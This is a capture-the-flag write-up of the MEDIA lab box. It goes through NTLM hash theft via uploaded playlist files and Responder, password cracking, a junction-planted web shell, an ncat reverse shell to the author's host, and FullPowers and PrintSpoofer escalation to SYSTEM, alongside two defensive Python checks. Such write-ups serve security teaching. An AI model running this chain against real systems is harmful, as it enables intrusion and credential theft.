Here are my notes on the MEDIA box from Vulnlab, which was deployed to HackTheBox.
MEDIA: 10.10.93.210
PORT STATE SERVICE
22/tcp open ssh
┌──(root㉿kali)-[/home/kali/VL/MEDIA/10.10.93.210]
└─# hydra -l enox -p 1234virus@ 10.10.93.210 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-15 14:31:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://10.10.93.210:22/
[22][ssh] host: 10.10.93.210 login: enox password: 1234virus@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-15 14:31:05
ssh enox@10.10.93.210
enox@MEDIA C:\Users\enox>whoami
media\enox
enox@MEDIA C:\Users\enox>hostname
MEDIA
USER-SHELL !
enox@MEDIA C:\Users\enox\Desktop>whoami
media\enox
enox@MEDIA C:\Users\enox\Desktop>hostname
MEDIA
enox@MEDIA C:\Users\enox\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Users\enox\Desktop
10/02/2023 10:04 AM <DIR> .
10/02/2023 09:26 AM <DIR> ..
10/10/2023 02:58 AM 36 user.txt
1 File(s) 36 bytes
2 Dir(s) 8,561,770,496 bytes free
enox@MEDIA C:\Users\enox\Desktop>type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
enox -> nt authority\local service:
enox@MEDIA C:\Users\enox\Documents>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Users\enox\Documents
10/02/2023 10:04 AM <DIR> .
10/02/2023 09:26 AM <DIR> ..
10/02/2023 05:00 PM 2,841 review.ps1
1 File(s) 2,841 bytes
2 Dir(s) 8,561,750,016 bytes free
enox@MEDIA C:\Users\enox\Documents>type review.ps1
function Get-Values {
param (
[SNIP]
$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
[SNIP]
enox@MEDIA C:\Windows\Tasks\Uploads>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads
11/15/2024 11:28 AM <DIR> .
10/02/2023 10:04 AM <DIR> ..
11/15/2024 11:27 AM <DIR> 7025e83db13769ba56c6cfac86dddc8b
11/15/2024 11:28 AM <DIR> d41d8cd98f00b204e9800998ecf8427e
11/15/2024 10:49 AM <DIR> f38a39dedc14746cbeb5327a3557547c
11/15/2024 11:28 AM 0 todo.txt
1 File(s) 0 bytes
5 Dir(s) 8,561,750,016 bytes free
enox@MEDIA C:\Windows\Tasks\Uploads>type todo.txt
enox@MEDIA C:\Windows\Tasks\Uploads>cd d41d8cd98f00b204e9800998ecf8427e
enox@MEDIA C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e
11/15/2024 11:28 AM <DIR> .
11/15/2024 11:28 AM <DIR> ..
11/15/2024 11:28 AM 145 Show.asx
1 File(s) 145 bytes
2 Dir(s) 8,561,741,824 bytes free
#This is where the uploaded files end up: each upload lands in its own hash-named subfolder under C:\Windows\Tasks\Uploads.
#Anything can be uploaded through the upload field of the HTTP service on TCP port 80, the one that asks for a Windows Media Player compatible video.
C:\Windows\Tasks\Uploads is writable by enox, so files and links can be created there.
PS C:\xampp\htdocs> echo "hello world" > test.txt #NOPE
out-file : Access to the path 'C:\xampp\htdocs\test.txt' is denied.
Windows SYMBOLIC LINK (junction) PRIV ESC:
mklink /J C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php C:\xampp\htdocs\shell.php
https://www.howtogeek.com/16226/complete-guide-to-symbolic-links-symlinks-on-windows-or-linux/
enox@MEDIA C:\Windows\Tasks\Uploads>mklink /J C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php C:\xampp\htdocs\shell.php
Junction created for C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php <<===>> C:\xampp\htdocs\shell.php
#Upload shell.php through the same upload field as before; the web service writes it through the junction into C:\xampp\htdocs.
enox@MEDIA C:\Windows\Tasks\Uploads>dir C:\xampp\htdocs
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\xampp\htdocs
11/15/2024 12:10 PM <DIR> .
10/02/2023 10:03 AM <DIR> ..
10/02/2023 09:27 AM <DIR> assets
10/02/2023 09:27 AM <DIR> css
10/10/2023 04:00 AM 20,563 index.php
10/02/2023 09:27 AM <DIR> js
11/15/2024 12:10 PM 17,220 shell.php
2 File(s) 37,783 bytes
5 Dir(s) 8,502,398,976 bytes free
enox@MEDIA C:\Windows\Tasks\Uploads>dir C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e
11/15/2024 12:10 PM <DIR> .
11/15/2024 12:11 PM <DIR> ..
11/15/2024 12:10 PM <JUNCTION> shell.php [C:\xampp\htdocs\shell.php]
0 File(s) 0 bytes
3 Dir(s) 8,502,300,672 bytes free
http://10.10.124.184/shell.php
p0wny@shell:C:\xampp\htdocs# whoami
nt authority\local service
p0wny@shell:C:\xampp\htdocs# hostname
MEDIA
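The write that the junction redirects is the upload handler's own. As an added defensive example (not code from the box or its web app), here is a Python path check an upload handler could run before opening the destination: it refuses any component under the upload root that is a symlink or Windows reparse point (junction) and any resolved path that leaves the root. The function names, the temp-directory layout and the symlink standing in for mklink /J in the demo are assumptions.

```python
import os
import stat
import tempfile

FILE_ATTRIBUTE_REPARSE_POINT = 0x400  # set on Windows junctions and symlinks

def is_reparse_point(path):
    """True for a symlink on any OS, or a Windows reparse point such as a junction."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if stat.S_ISLNK(st.st_mode):
        return True
    return bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_REPARSE_POINT)

def safe_upload_path(base, subdir, filename):
    """Destination for an upload under base, or None if writing there is unsafe."""
    base = os.path.realpath(base)
    if not filename or filename in (".", "..") or "/" in filename or "\\" in filename:
        return None
    dest = os.path.join(base, subdir, filename)
    rel = os.path.relpath(dest, base)
    if rel == ".." or rel.startswith(".." + os.sep):
        return None
    # Check each component below base: a junction on the subfolder or on the
    # file name itself would redirect the write (the trick used on MEDIA).
    cur = base
    for part in rel.split(os.sep):
        cur = os.path.join(cur, part)
        if is_reparse_point(cur):
            return None
    # The fully resolved path must still sit inside base.
    if os.path.commonpath([base, os.path.realpath(dest)]) != base:
        return None
    return dest

def demo():
    """Rebuild the box's layout in a temp dir; a symlink stands in for mklink /J."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "Uploads")
        webroot = os.path.join(tmp, "htdocs")
        sub = "d41d8cd98f00b204e9800998ecf8427e"  # hash-named folder seen on the box
        os.makedirs(os.path.join(uploads, sub))
        os.makedirs(webroot)
        os.symlink(os.path.join(webroot, "shell.php"), os.path.join(uploads, sub, "shell.php"))
        clean = safe_upload_path(uploads, sub, "Show.asx") is not None
        blocked = safe_upload_path(uploads, sub, "shell.php") is None
        return clean, blocked  # expected (True, True)
```

On Windows the same check also catches junctions, because os.lstat exposes st_file_attributes with the reparse-point bit set.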
Convert it into a reverse-shell as usual:
PS C:\xampp\htdocs> whoami
nt authority\local service
PS C:\xampp\htdocs> hostname
MEDIA
PS C:\xampp\htdocs> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
NT Authority\Local Service privileges restored with FullPowers:
https://github.com/itm4n/FullPowers
https://itm4n.github.io/localservice-privileges/
./FullPowers.exe -c "C:\Users\Public\ncat.exe 10.8.0.71 4444 -e cmd" -z
C:\Windows\system32>whoami
whoami
nt authority\local service
C:\Windows\system32>hostname
hostname
MEDIA
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
#POTATO TIME !
C:\Users\Public>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
MEDIA
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
MEDIA
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Users\Administrator\Desktop
10/02/2023 10:04 AM <DIR> .
10/01/2023 10:48 PM <DIR> ..
10/10/2023 02:58 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 8,212,729,856 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
80/tcp open http
The Hiring section is very interesting.
Upload a brief introduction video (compatible with Windows Media Player):
Please upload a brief introduction video about yourself and your experiences, explaining why you think you're fit for the job.
We can upload malicious files that are compatible with Windows Media Player to steal the user's NTLMv2 hash with the ntlm_theft and Responder tools.
NTLM-THEFT:
.wax - via Windows Media Player playlist (Better, primary open)
.asx – via Windows Media Player playlist (Better, primary open)
.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
python3 ntlm_theft.py --generate all --server 10.8.0.71 --filename Show
Upload those three malicious files and capture the hash with the Responder tool:
sudo responder -I tun0
#Then wait for a few seconds to get the hash.
[SMB] NTLMv2-SSP Client : 10.10.93.210
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash : enox::MEDIA:e915d0afab6c5a00:B2D18C349D4AC1CE555BE36A3EB04D78:010100000000000080E90E4F6A37DB01E70F40DD9AA403FB0000000002000800350055004500330001001E00570049004E002D004E0036004F004400470042005300450046005900300004003400570049004E002D004E0036004F00440047004200530045004600590030002E0035005500450033002E004C004F00430041004C000300140035005500450033002E004C004F00430041004C000500140035005500450033002E004C004F00430041004C000700080080E90E4F6A37DB0106000400020000000800300030000000000000000000000000300000B98798DA7CAB81E9B0A60BD5F604A5C25B4FDF6BDACC09A7AD8A5D69695006EE0A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0030002E00370031000000000000000000
NTLMv2 HASH CAPTURED !
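As an added example (not code from the page's tools), a filter an upload endpoint could apply to the playlist types listed above before storing them: it extracts the references from .asx/.wax and .m3u content and flags any UNC (\\host) or file: reference, which is what makes the player authenticate to a remote share. The sample playlists and the 203.0.113.10 address are constructed for the demo.

```python
import re

# Constructed samples, not files from the box: one entry pointing at an SMB
# share (the pattern playlist-based NTLM theft relies on) and a benign one.
ASX_SUSPICIOUS = (
    '<asx version="3.0">\n'
    '  <entry><ref href="\\\\203.0.113.10\\share\\intro.wmv"/></entry>\n'
    '</asx>\n'
)
ASX_BENIGN = '<asx version="3.0"><entry><ref href="https://cdn.example.test/a.wmv"/></entry></asx>'
M3U_SUSPICIOUS = "#EXTM3U\n#EXTINF:1,intro\nfile://203.0.113.10/share/intro.mp3\n"

# .asx/.wax are XML-like but often not well-formed, so pull href values by regex.
HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# UNC (\\host or //host) and file: references are fetched over SMB/WebDAV by
# the client, which is where the NTLM challenge-response leaves the machine.
CRED_LEAK_RE = re.compile(r'^\s*(\\\\|//|file:)', re.IGNORECASE)

def playlist_refs(content, ext):
    """Every media/base reference in an .asx/.wax (tag-based) or .m3u (line-based) playlist."""
    ext = ext.lower()
    if ext in (".asx", ".wax"):
        return HREF_RE.findall(content)
    if ext == ".m3u":
        return [ln.strip() for ln in content.splitlines() if ln.strip() and not ln.startswith("#")]
    raise ValueError("unsupported playlist type: " + ext)

def credential_leak_refs(content, ext):
    """References an upload filter should reject before the file is stored or opened."""
    return [r for r in playlist_refs(content, ext) if CRED_LEAK_RE.match(r)]
```

Rejecting the upload (or rewriting the reference) is only part of the fix; the host that later opens the file still needs outbound SMB blocked at the perimeter so a missed reference cannot reach an attacker-controlled share.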
┌──(root㉿kali)-[/home/kali/VL/MEDIA/10.10.93.210]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234virus@ (enox)
1g 0:00:00:34 DONE (2024-11-15 14:29) 0.02914g/s 388767p/s 388767c/s 388767C/s 1234ถ6789..1234dork
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
HASH CRACKED !
enox:1234virus@
3389/tcp open ms-wbt-server